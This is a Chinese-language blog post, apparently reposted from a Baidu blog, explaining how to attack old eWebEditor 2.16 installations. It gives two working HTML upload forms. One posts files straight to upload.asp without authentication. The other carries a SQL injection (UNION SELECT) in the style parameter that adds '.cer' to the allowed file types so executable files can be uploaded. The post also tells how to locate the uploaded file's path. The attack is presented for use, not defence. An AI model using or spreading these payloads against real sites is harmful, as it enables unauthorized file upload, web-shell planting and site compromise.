ewebeditor editor通过upload.asp构建form直接上传,及注入漏洞上传解释

今天碰到几个老版本的ewebeditor,就是2.16版本,早听说有注入,但是没玩过。这儿截图详细说下,算测试了。

1.构造正常表单:(对所有版本的ewebeditor都适用的)

<form action=”http://www.xxx.com/ewebeditor/upload.asp?action=save&type=IMAGE&style=” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

这个表单对没有登录也没有ewebeditor.asp与admin_style.asp的也适用。

2.构造2.16版本注入上传表单网页

<form action=”http://www.xxxxx.cn/oa//ewebeditor/upload.asp?action=save&type=IMAGE&style=standardxxx’ union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|cer’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=’standard’and’a’=’a” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>

==========这儿看到了。standardxxx是故意写的随便一个不存在的样式,那么才会以后面的union选择出来的为准了。而后面的文件类型加上了|cer,那么我们就可以上传cer文件了。

这儿截图说下如何知道成功与否及找到地方:

用2中的表单上传后,返回的页面也就是一个普通的上传页面,不过一定要打开html来看,在文件最后就有上传成功或者失败的提示,而且有路径哟。一般肯定对应uploadfile或uploadfiles目录。

from:http://hi.baidu.com/it_security/blog/item/e1cf3f4ec8b13d3bafc3ab98.html

发表评论

电子邮件地址不会被公开。

您可以使用这些HTML标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>